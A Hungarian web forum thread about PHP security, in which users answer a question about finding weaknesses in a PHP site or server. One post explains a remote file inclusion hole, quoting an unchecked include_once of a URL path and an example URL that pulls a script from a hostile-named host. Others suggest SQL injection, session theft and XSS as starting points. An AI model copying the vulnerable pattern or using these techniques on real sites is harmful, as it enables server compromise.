- aquark: A ló túloldalán (Intel-AMD szivatás)
- Luck Dragon: Asszociációs játék. :)
- sziku69: Szólánc.
- gban: Ingyen kellene, de tegnapra
- sziku69: Fűzzük össze a szavakat :)
- aquark: Jó platformer játékokat keresek!
- Imilenni: Egy kis depi (szösszenet inkább), remélem elfér itt :) 3#
- Geri Bátyó: Agglegénykonyha 5 – Edények és konyhai eszközök
- Sub-ZeRo: Euro Truck Simulator 2 & American Truck Simulator 1 (esetleg 2 majd, ha lesz) :)
- D1Rect: Nagy "hülyétkapokazapróktól" topik
Új hozzászólás Aktív témák
-
disy68
aktív tag
válasz
MacCaine
#18710
üzenetére
RFI. Én olyannal találkoztam, hogy a routing volt megoldva ellenőrizetlen bemenetekkel szép url megoldásnál.
Pl: oldal.hu/aloldal
htaccess-el volt egy átirányítás
RewriteRule ^(.*)$ /index.php?path=$1 [NC,L,QSA]ahol az aloldal került a $path változóba, majd ez lett include-olva.
include_once($path);Szóval meghívva a oldal.hu/http://gonoszoldal.hu/meggonoszabb_script.php
Az kerül meghívásra, hogyinclude_once('http://gonoszoldal.hu/meggonoszabb_script.php
'); -
disy68
aktív tag
válasz
MacCaine
#18705
üzenetére
Na így más a helyzet kicsit. Mi az elvárás? Csak a php-s alkalmazás problémáit megtalálni vagy az egész rendszerét? Ha az előbbi, akkor a korábbi link, illetve ez segíthet.
Ha az utóbbi, akkor bonyolódik a helyzet. Ha a webszerver apache, akkor a linkelt oldalon elindulhatsz. Ezen kívül persze lehet az oprendszer is gyenge pont és máris jóval terjedelmesebb a lehetséges sebezhetőségek száma. Nem is beszélve az esetleges egymásra épülő hibák kihasználásáról. -
DNReNTi
őstag
válasz
MacCaine
#18705
üzenetére
Konkretan a webszerverre valo betoreshez nem gondolnam, hogy a PHP lenne a belepesi pont. Ez inkabb linux/unix varazslat kellene hogy legyen. Ha konkretan egy PHP alapu alkalmazast akarsz felnyomni, az mas. Akkor jo kiindulasi alap amit disy68 linkelt.
En SQL injection-nel kezdenem, aztan lehet tovabbmenni session lopassal, XSS-el, esatobbi. Mondom ezt ugy, hogy sose csinaltam meg ilyesmit. -
disy68
aktív tag
-
DNReNTi
őstag
válasz
MacCaine
#18700
üzenetére
Nem feltetlenul kell a konkret peldat megosztani, linkekkel, hozzaferessel es koddal, teszem azt kaptal egy finom SQL injection-t, eleg megkerdezni mit tegyel ellene, min valtoztass, vagy mondjuk valami robot arto fajlt tol es futtata a szervereden, mit lehet tenni, esetleg hogyan authentikalj helyesen.
Ezekre akkor is lehet valaszolni, ha az ember nem tudja pontosan melyik oldalrol van szo. No de nem okoskodok, ha privat, akkor legyen privat. -
De ha lenne ilyen topik, en olvasgatnam.
En SQL injection-nel kezdenem, aztan lehet tovabbmenni session lopassal, XSS-el, esatobbi. Mondom ezt ugy, hogy sose csinaltam meg ilyesmit.
Ejnye.Új hozzászólás Aktív témák
Hirdetés
- Microsoft Surface Pro 7 Érintős Szétszedhető Laptop Tablet 12,3" -80% i5-1035G4 8/256 Retina
- Mars Gaming MK60W 60% Mechanikus Blue Switches Gamer Billentyűzet Spanyol Kiosztás
- 2019 - BMW I3S 120Ah
- ASUS ROG Strix G15 144Hz / AMD Ryzen 5 / RTX 3050Ti / 16GB RAM / 512GB SSD
- Microsoft Surface Pro 7+ Érintős Szétszedhető Laptop Tablet 12,3" -80% i5-1135G7 16/256 Retina
- LG 49SE3D-B 49" FullHD LED Monitor
- Targus Universal USB 3.0 DV1K-2K Compact docking station (DisplayLink)
- ÁRGARANCIA!Épített KomPhone Ryzen 7 7800X3D 32/64GB RAM RX 9070 16GB GAMER PC termékbeszámítással
- iKing.Hu-Nothing Phone 3a Pro Grey Glyph stílus, 3 optikai zoom 12/256 GB -3 hónap garancia
- Honor Pad X9 / 4GB RAM 128 GB / Kártyafüggetlen / 12Hó Garancia
Állásajánlatok
Cég: CAMERA-PRO Hungary Kft.
Város: Budapest
Cég: PCMENTOR SZERVIZ KFT.
Város: Budapest